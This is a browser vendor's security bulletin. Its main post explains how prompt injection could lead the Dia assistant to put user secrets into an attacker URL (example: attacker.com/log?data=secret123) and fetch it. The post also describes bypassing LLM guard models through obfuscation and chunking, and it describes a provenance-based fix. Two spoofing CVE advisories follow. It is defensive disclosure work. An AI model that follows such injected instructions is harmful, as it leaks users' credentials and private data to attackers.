Our latest updates on Security

Welcome to our Dia Security Bulletin. Here you’ll find the most up to date information on recent security fixes and security news for Dia. We get into the weeds a little here, if you have any questions you can always find us on security@thebrowser.company.

February 12, 2026

Security Story of fetch_web_content

How we built a powerful feature, discovered it could be exploited, and rebuilt it from the ground up with security at its core.

TL;DR

This post tells the story of fetch_web_content, a tool that lets Dia retrieve information from the web on your behalf. We built it, discovered it could be exploited for data exfiltration via prompt injection, spent months trying to secure it with detection-based approaches, and ultimately concluded that detection wasn't enough. We made the difficult decision to remove the feature before Dia's public beta in June 2025. Two months later, we brought it back—rebuilt from the ground up with architectural controls that remain secure even when prompt injection occurs.

This is a story about what it looks like to take AI security seriously: acknowledging when something isn't working, having the discipline to unship, and investing in solutions that address root causes rather than symptoms. It's also just one example—Dia's security architecture includes many layers of protection, each designed to address different threat vectors. This post is a deep dive into one of them.

What is fetch_web_content?

fetch_web_content is one of Dia's most versatile tools. It allows the assistant to retrieve information from URLs—pulling in web pages, documentation, articles, and other online resources to provide richer, more informed responses.

When a user asks Dia to summarize a link, check the status of a service, or pull in context from the web, fetch_web_content makes that possible. It's the kind of capability that transforms an AI assistant from a static knowledge base into a dynamic, connected helper.

We were excited to ship it. It was one of the first tools we built—present in Dia's earliest internal builds back in January 2025.

Then we broke it.

The Discovery: Data Exfiltration via URL Encoding

During security testing, our team uncovered a serious vulnerability class. The attack vector was elegant in its simplicity and terrifying in its implications.

Here's how it works:

URLs can encode arbitrary data. A URL like https://attacker.com/log?data=secret123 transmits secret123 to attacker.com when fetched.

LLMs are eager to follow instructions. If an attacker can inject malicious instructions into content the model processes (via prompt injection), they can instruct the model to:

  1. Extract sensitive information from the user's context
  2. Encode that data into a URL parameter
  3. Call fetch_web_content on that URL

The fetch itself becomes the exfiltration. The moment Dia makes that request, the sensitive data—passwords, API keys, private conversations, whatever was in context—gets transmitted to the attacker's server in the request logs.

No fancy exploits. No zero-days. Just the normal, intended behavior of a URL fetch, exploited through prompt injection.

The Attempt: Can We Detect and Block This?

Once we understood the shape of the attack, our first instinct was straightforward: keep the feature, but get really good at spotting the bad cases.

That led us down the detection path. We tried a bunch of variants of the same basic idea: let the model decide what to fetch, then add checks to catch exfiltration before the request goes out.

Here’s what we tested through the first half of 2025:

  • URL allowlisting and blocklisting — This sounds reasonable until you remember how cheap domains are. Attackers can register new domains instantly, and even legitimate sites can be turned into collection endpoints.
  • Pattern detection for sensitive data in URLs — We looked for things that “seem like secrets” (tokens, keys, long base64-ish blobs, etc.). The false positive rate was brutal, because real-world URLs are full of encoded parameters. And in the cases that mattered most, attackers could just transform or split the data until it no longer matched.
  • Heuristic analysis of URL structure — We tried scoring requests based on URL shape: parameter length, entropy, suspicious parameter names, unusual encoding patterns, and so on. This helped catch the obvious stuff, but sophisticated attackers would have no trouble producing URLs that looked completely normal.
  • Output filtering — Another thought was “even if the model tries to exfiltrate, we’ll catch it on the way out.” But the model can obfuscate data before encoding it, or distribute it across multiple innocuous-looking requests.
  • Prompt-based guardrails — We also tried the standard "tell the model not to do that" approach. The problem is prompt injection is the attack. If your defense relies on the model consistently ignoring malicious instructions, you're betting against the one thing the attacker is best positioned to influence.

We also explored a natural escalation of these ideas: using LLMs themselves as part of the defense—either to review the page context for signs of prompt injection, or to inspect the generated URL and decide whether it looked like exfiltration.

On paper, this is appealing. Models can reason about intent, generalize beyond fixed patterns, and catch things that would slip past regex and heuristics.

In practice, it didn’t change the outcome. Our team was able to bypass every LLM-based detection mechanism we tried—regardless of model size—using the same playbook attackers use everywhere else: obfuscation, indirection, chunking, encoding, and “make it look normal” transformations. Even when the guard model flagged attacks sometimes, it wasn’t consistent enough to be a security boundary we could actually rely on.

We kept circling back to the same uncomfortable conclusion: we were trying to tell the difference between a legitimate fetch and a malicious fetch after the model had already decided to make the request—and the adversary could shape both the content and the model’s behavior.

Detection-based security is not sufficient when the attacker controls the input to your detector and can influence the detector's ruleset.

What About Asking the User?

There's one mitigation we haven't mentioned yet: human-in-the-loop confirmation. What if we just asked the user before fetching each URL?

This sounds reasonable. It's a pattern users have seen before—banks, social networks, and other sites show similar prompts when you click an external link. But we concluded that humans couldn't effectively be in the loop here, for several reasons:

The risk profile is completely different. Those familiar prompts warn you that you're leaving a trusted site—not that your data might be stolen immediately by proceeding. When a bank shows "You are now leaving Example Bank," the worst case is usually landing on a phishing page you can recognize and close. Our prompt would need to communicate something much more severe: "If you approve this, sensitive data from your context could be transmitted to an attacker." Users aren't trained to think about URL fetches this way, and we couldn't expect them to understand how novel this situation is.

It's a terrible user experience. Dia often fetches multiple URLs to answer a single question—pulling in documentation, checking references, gathering context. Prompting for each fetch would be exhausting and would undermine the core value of having an AI assistant that can work with the web on your behalf.

Even "allowlist this domain" doesn't work. You might think users could approve trusted domains once and be done with it. But most major domains have open redirects—URL endpoints that will redirect to any destination. Allowlist youtube.com, and an attacker can use YouTube's well-known open redirect to bounce data to their own server. The allowlist becomes a bypass, not a protection.

In this situation: we couldn't make users the security boundary. The solution had to be architectural.

The Decision: Unlaunch

By June 2025, we were preparing to launch Dia's public beta. We had a decision to make.

This wasn't a close call. We had a feature that could be exploited to exfiltrate user data, and we couldn't reliably prevent it.

We unlaunched fetch_web_content. It didn't ship with the beta.

Shipping fast matters. Shipping secure matters more.

The Rebuild: Secure by Design

We went back to first principles. Instead of asking "how do we detect malicious fetches?" we asked "how do we make this class of malicious fetches impossible in practice?"

The answer required rethinking the feature's architecture entirely:

URL Provenance

By design, fetch_web_content enforces provenance—a clear chain of custody showing where a URL came from. URLs that appear in the user's browsing context, their tabs, their messages? Those have provenance. URLs the model generates from whole cloth, potentially stuffed with exfiltrated data? Those don't.

If a URL can't demonstrate where it came from, fetch_web_content is designed to reject it.

URLs with provenance (allowed):

  • A link the user clicks or pastes—"Summarize this article" with a URL from their clipboard or an open tab
  • A link visible in the user's browsing context—a URL from a webpage they're actively viewing
  • A link from a message or email—a URL that appeared in a Slack message, email, or chat the user shared with Dia
  • A link from a document the user opened—a URL embedded in a PDF, Google Doc, or Notion page the user explicitly gave Dia access to

URLs without provenance (blocked):

Provenance isn't about whether a URL looks safe—it's about whether we can trace it back to something the user actually provided or intended to access. The model can choose which URLs to fetch, but provenance enforcement dramatically narrows the set of URLs it can access to those rooted in the user's context.

Assume Prompt Injection Will Happen

This is the key mental shift. We stopped designing for a world where we successfully block all prompt injection. We started designing for a world where prompt injection happen, and the attacker can’t get the results they want.

When an attacker injects malicious instructions, Dia might follow them. It might even try to construct a malicious URL. But when it calls fetch_web_content, the URL is checked against its provenance policy. Attacker-constructed URLs are rejected before data leaves the device.

Defense in Depth

URL provenance is our primary control, but it's not our only one. We've layered additional safeguards throughout the system. The details are less important than the principle: no single control failing should compromise user security.

The Result

A couple of months later, fetch_web_content came back. It's just as useful as before—users can ask Dia to pull in web content, summarize articles, and work with online resources.

But now, even if an attacker achieves prompt injection, this attack vector is effectively closed off.

To be clear: this doesn't mean fetch_web_content is immune to all misuse, or that prompt injection is "solved." Other attack patterns require other defenses. What we've done is architecturally close off this specific threat—data exfiltration via URL encoding—so that even a successful prompt injection can't exploit it.

Why This Matters

The security community has been sounding the alarm on prompt injection for years. And they're right—it's a hard problem without a clean solution. You can't consistently and robustly detect all prompt injections, which means you can't fully trust model outputs.

But you can design systems that limit blast radius even when prompt injection succeeds.

This is the path forward for AI security: assume compromise, design for containment.

fetch_web_content is one tool, and URL provenance is one control. Dia's broader security posture includes many other systems—each with its own story of iteration, testing, and refinement. We'll share more of those stories over time.

Join Us

Building AI agents that can safely interact with the real world is still a frontier problem. The attacks are evolving, the tooling is immature, and the cost of getting it wrong is real user harm.

That’s why our Trust and Safety team is growing. If you’re excited about AI security—agent containment, prompt injection defense, tool safety, sandboxing, provenance, and defense-in-depth—and you want to help build Dia’s AI capabilities the right way, we’d love to talk.

We’re hiring.

January 15, 2026

CVE-2025-15032: Increased Spoofing risk; custom new window missing about:blank

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-15032
  • Advisory Release Date: Fri, Jan 16, 2026
  • Affected Version: Dia version <1.9.0
  • Severity: High

Details

With this issue, an attacker-controlled site could potentially open a new custom-sized window where the URL bar did not display about:blank — this could allow an attacker to make a window’s title appear like a trusted domain and potentially mislead users about what site they were on.

In Dia versions ≥1.9.0, about:blank is displayed in the URL bar in these scenarios, which makes spoof attempts more visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on MacOS Version <1.9.0

What do I need to do?

Update Dia to the latest available version. Any version 1.9.1 or newer contains the fix.

Credit

The Browser Company thanks frozzipies and novemberelang for reporting this issue through our vulnerability rewards program.

November 20, 2025

CVE-2025-13132: Increased Spoof Risk; Missing full screen toast

  • Summary: Increased Spoof Risk in affected MacOS versions of Dia
  • CVE ID: CVE-2025-13132
  • Advisory Release Date: Fri, Nov 21, 2025
  • Affected Versions: Dia versions <1.6
  • Severity: High

Details

This vulnerability allowed a site to enter fullscreen without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar.)

In Dia versions ≥1.6, the fullscreen notification (toast) is now enabled in all scenarios, informing users in a transition to fullscreen and making spoof attempts visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on MacOS versions <1.6

What do I need to do?

Update Dia to the latest available version. Any version 1.6 or newer contains the fix.

Credit

The Browser Company thanks @frozzipies for reporting this issue through our vulnerability rewards program.

October 15, 2025

Introducing Dia’s Security Bulletin

Hi there, Cory here! I’m the Head of Security at The Browser Company. With the general availability of Dia being announced, the security team is introducing Dia’s Security Bulletin page.

Security has been at the core of how we built Dia. Being an AI Browser introduces novel security considerations—from prompt injection and model supply chain risks to client hardening and safe integrations. We’re committed to transparent, actionable communication when there’s something users or admins need to do.

This page will host:

  • Advisories: Clear guidance on vulnerabilities affecting Dia and steps to remediate.
  • CVE Notices: Disclosures aligned with our CNA policy and assignment process.
  • Security-impacting Release Notes: Highlights of patches, mitigations, and hardening work.
  • Enterprise Updates: Admin controls, policy changes, and audit-related information.

Publishing cadence will be event-driven: when there’s user- or admin-action to take, you’ll see it here first, with severity, affected versions, and fix paths.

If you believe you’ve found a security issue, please report it through our bug bounty program or responsible disclosure channels listed on the Dia Security Center. Thank you for helping us keep users safe.